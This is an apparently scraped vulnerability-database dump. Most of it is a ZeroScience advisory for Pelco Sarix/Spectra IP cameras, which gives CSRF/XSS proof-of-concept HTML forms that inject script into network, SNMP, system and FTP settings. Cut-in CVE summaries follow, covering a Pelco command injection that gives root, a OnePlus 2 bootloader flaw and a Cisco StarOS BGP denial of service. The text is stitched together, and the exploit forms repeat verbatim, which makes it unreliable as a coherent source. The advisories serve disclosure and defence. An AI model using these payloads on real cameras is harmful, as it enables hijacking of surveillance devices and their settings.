<input type="hidden" name="password" value="blah" />
<input type="hidden" name="anonymous_id" value=" " />
<input type="hidden" name="ca_certificate" value="test" />
<input type="hidden" name="client_certificate" value="test" />
<input type="hidden" name="private_key" value="test" />
<input type="hidden" name="private_key_password" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
-------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/general/update" method="POST">
<input type="hidden" name="hostname" value='"><script>alert(2)</script>' />
<input type="hidden" name="http_port" value='"><script>alert(3)</script>' />
<input type="hidden" name="rtsp_port" value='"><script>alert(4)</script>' />
<input type="hidden" name="dhcp" value="off" />
<input type="hidden" name="ip_address" value='"><script>alert(5)</script>' />
<input type="hidden" name="subnet_mask" value='"><script>alert(6)</script>' />
<input type="hidden" name="gateway" value='"><script>alert(7)</script>' />
<input type="hidden" name="nameservers" value='"><script>alert(8)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on version parameter:
------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/snmp/update" method="POST">
<input type="hidden" name="version" value='";alert(9)//' />
<input type="hidden" name="v2_community_string" value="public" />
<input type="hidden" name="v2_receiver_address" value="" />
<input type="hidden" name="v2_trap_community_string" value="trapbratce" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
----------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/system/general/update" method="POST">
<input type="hidden" name="device_name" value='ZSL"><script>alert(10)</script>' />
<input type="hidden" name="enable_leds" value="on" />
<input type="hidden" name="smtp_server" value='"><script>alert(11)</script>' />
<input type="hidden" name="ntp_server_from_dhcp" value="false" />
<input type="hidden" name="ntp_server" value="';alert(12)//'" />
<input type="hidden" name="region" value="Macedonia';alert(13)//" />
<input type="hidden" name="zone" value="Kumanovo';alert(14)//" />
<input type="hidden" name="enable_time_overlay" value="on" />
<input type="hidden" name="enable_name_overlay" value="off" />
<input type="hidden" name="position" value="topright" />
<input type="hidden" name="date_format" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
--------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/events/handlers/update" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="relay_sentinel" value="relay_sentinel" />
<input type="hidden" name="name" value='"><script>alert(15)</script>' />
<input type="hidden" name="type" value="Ftp" />
<input type="hidden" name="email_to" value="" />
<input type="hidden" name="email_from" value="" />
<input type="hidden" name="email_subject" value="" />
<input type="hidden" name="email_message" value="" />
<input type="hidden" name="dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="limit_size" value="" />
<input type="hidden" name="limit_size_scale" value="K" />
<input type="hidden" name="ftp_server" value='"><script>alert(16)</script>' />
<input type="hidden" name="ftp_username" value='"><script>alert(17)</script>' />
<input type="hidden" name="ftp_password" value='"><script>alert(18)</script>' />
<input type="hidden" name="ftp_base_path" value='"><script>alert(19)</script>' />
<input type="hidden" name="ftp_dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="relay_bankName" value="GPIO" />
<input type="hidden" name="relay_index" value="0" />
<input type="hidden" name="relay_on_time" value="0.1" />
<input type="hidden" name="relay_off_time" value="0.1" />
<input type="hidden" name="relay_pulse_count" value="" />
<input type="hidden" name="filter_start0" value="" />
<input type="hidden" name="filter_stop0" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
| VAR-201905-1049 | CVE-2018-7825 | Schneider Electric 1st Gen Pelco Sarix Enhanced Camera Command Injection Vulnerability |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
A Command Injection vulnerability exists in the web-based GUI of the 1st Gen PelcoSarix Enhanced Camera that could allow a remote attacker to execute arbitrary commands. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the fact that external input data constructs executable commands, and the network system or product does not properly filter the special elements. An attacker could exploit the vulnerability to execute an illegal command. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0.
Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed
for security surveillance in a wide variety of commercial and industrial
settings. From our industry-leading fixed and high-speed IP cameras to
panoramic, thermal imaging, explosionproof and more, we offer a camera
for any environment, any lighting condition and any application.
When nothing but the best will do. SarixaC/ Enhanced Range cameras
provide the most robust feature-set for your mission-critical applications.
With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image
in difficult lighting conditions such as a combination of bright areas,
shaded areas, and intense light. Designed with superior reliability,
fault tolerance, and processing speed, these rugged fixed IP cameras
ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected
XSS vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
Lighttpd/1.4.28
PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5415
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
-------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/dot1x/update" method="POST">
<input type="hidden" name="dot1x" value="on" />
<input type="hidden" name="protocol" value="EAP-TLS" />
<input type="hidden" name="inner_auth" value="CHAP" />
<input type="hidden" name="username" value='"><script>alert(1)</script>' />
<input type="hidden" name="password" value="blah" />
<input type="hidden" name="anonymous_id" value=" " />
<input type="hidden" name="ca_certificate" value="test" />
<input type="hidden" name="client_certificate" value="test" />
<input type="hidden" name="private_key" value="test" />
<input type="hidden" name="private_key_password" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
-------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/general/update" method="POST">
<input type="hidden" name="hostname" value='"><script>alert(2)</script>' />
<input type="hidden" name="http_port" value='"><script>alert(3)</script>' />
<input type="hidden" name="rtsp_port" value='"><script>alert(4)</script>' />
<input type="hidden" name="dhcp" value="off" />
<input type="hidden" name="ip_address" value='"><script>alert(5)</script>' />
<input type="hidden" name="subnet_mask" value='"><script>alert(6)</script>' />
<input type="hidden" name="gateway" value='"><script>alert(7)</script>' />
<input type="hidden" name="nameservers" value='"><script>alert(8)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on version parameter:
------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/snmp/update" method="POST">
<input type="hidden" name="version" value='";alert(9)//' />
<input type="hidden" name="v2_community_string" value="public" />
<input type="hidden" name="v2_receiver_address" value="" />
<input type="hidden" name="v2_trap_community_string" value="trapbratce" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
----------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/system/general/update" method="POST">
<input type="hidden" name="device_name" value='ZSL"><script>alert(10)</script>' />
<input type="hidden" name="enable_leds" value="on" />
<input type="hidden" name="smtp_server" value='"><script>alert(11)</script>' />
<input type="hidden" name="ntp_server_from_dhcp" value="false" />
<input type="hidden" name="ntp_server" value="';alert(12)//'" />
<input type="hidden" name="region" value="Macedonia';alert(13)//" />
<input type="hidden" name="zone" value="Kumanovo';alert(14)//" />
<input type="hidden" name="enable_time_overlay" value="on" />
<input type="hidden" name="enable_name_overlay" value="off" />
<input type="hidden" name="position" value="topright" />
<input type="hidden" name="date_format" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
--------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/events/handlers/update" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="relay_sentinel" value="relay_sentinel" />
<input type="hidden" name="name" value='"><script>alert(15)</script>' />
<input type="hidden" name="type" value="Ftp" />
<input type="hidden" name="email_to" value="" />
<input type="hidden" name="email_from" value="" />
<input type="hidden" name="email_subject" value="" />
<input type="hidden" name="email_message" value="" />
<input type="hidden" name="dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="limit_size" value="" />
<input type="hidden" name="limit_size_scale" value="K" />
<input type="hidden" name="ftp_server" value='"><script>alert(16)</script>' />
<input type="hidden" name="ftp_username" value='"><script>alert(17)</script>' />
<input type="hidden" name="ftp_password" value='"><script>alert(18)</script>' />
<input type="hidden" name="ftp_base_path" value='"><script>alert(19)</script>' />
<input type="hidden" name="ftp_dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="relay_bankName" value="GPIO" />
<input type="hidden" name="relay_index" value="0" />
<input type="hidden" name="relay_on_time" value="0.1" />
<input type="hidden" name="relay_off_time" value="0.1" />
<input type="hidden" name="relay_pulse_count" value="" />
<input type="hidden" name="filter_start0" value="" />
<input type="hidden" name="filter_stop0" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
| VAR-201708-1052 | CVE-2017-11105 | OnePlus 2 Primary Bootloader Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
The OnePlus 2 Primary Bootloader (PBL) does not validate the SBL1 partition before executing it, although it contains a certificate. This allows attackers with write access to that partition to disable signature validation. OnePlus 2 Primary Bootloader (PBL) Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. OnePlus2 is a smartphone from China OnePlus. PrimaryBootloader (PBL) is one of the main boot loaders. There is a security hole in OnePlus2PBL. An attacker could exploit the vulnerability to turn off signature verification
| VAR-201707-0901 | CVE-2017-6729 | Cisco ASR 5000 For series router Cisco StarOS and VPC Software BGP In processing functions BGP Process reload vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the Border Gateway Protocol (BGP) processing functionality of the Cisco StarOS operating system for Cisco ASR 5000 Series Routers and Cisco Virtualized Packet Core (VPC) Software could allow an unauthenticated, remote attacker to cause the BGP process on an affected system to reload, resulting in a denial of service (DoS) condition. This vulnerability affects the following products if they are running the Cisco StarOS operating system and BGP is enabled for the system: Cisco ASR 5000 Series Routers and Cisco Virtualized Packet Core Software. More Information: CSCvc44968. Known Affected Releases: 16.4.1 19.1.0 21.1.0 21.1.M0.65824. Known Fixed Releases: 21.3.A0.65902 21.2.A0.65905 21.1.b0.66164 21.1.V0.66014 21.1.R0.65898 21.1.M0.65894 21.1.0.66030 21.1.0. Vendors have confirmed this vulnerability Bug ID CSCvc44968 It is released as.BGP Process reloaded, resulting in service disruption (DoS) There is a possibility of being put into a state. The Cisco ASR5000 Series is a carrier-grade platform for deploying high-demand 3G networks and migrating to Long Term Evolution (LTE). A security vulnerability exists in the Cisco ASR5000 Series Router. A remote attacker can cause a denial of service by sending a specific TCP packet to the StarOSBorderGatewayProtocol (BGP) service.
An attacker can exploit this issue to cause a denial-of-service condition.
This issue is being tracked by Cisco Bug ID CSCvc44968. StarOS is an operating system used in it